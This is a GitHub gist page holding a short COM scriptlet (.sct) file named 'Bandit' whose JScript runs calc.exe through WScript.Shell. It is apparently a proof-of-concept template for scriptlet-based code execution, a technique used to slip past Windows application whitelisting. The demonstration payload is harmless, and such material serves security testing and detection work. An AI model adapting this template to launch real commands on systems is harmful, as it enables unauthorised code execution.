Skip to content

Instantly share code, notes, and snippets.

@med0x2e
Created May 22, 2019 13:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save med0x2e/bb7d5e1050ff2654b4d1b0214eceb4c9 to your computer and use it in GitHub Desktop.
Save med0x2e/bb7d5e1050ff2654b4d1b0214eceb4c9 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment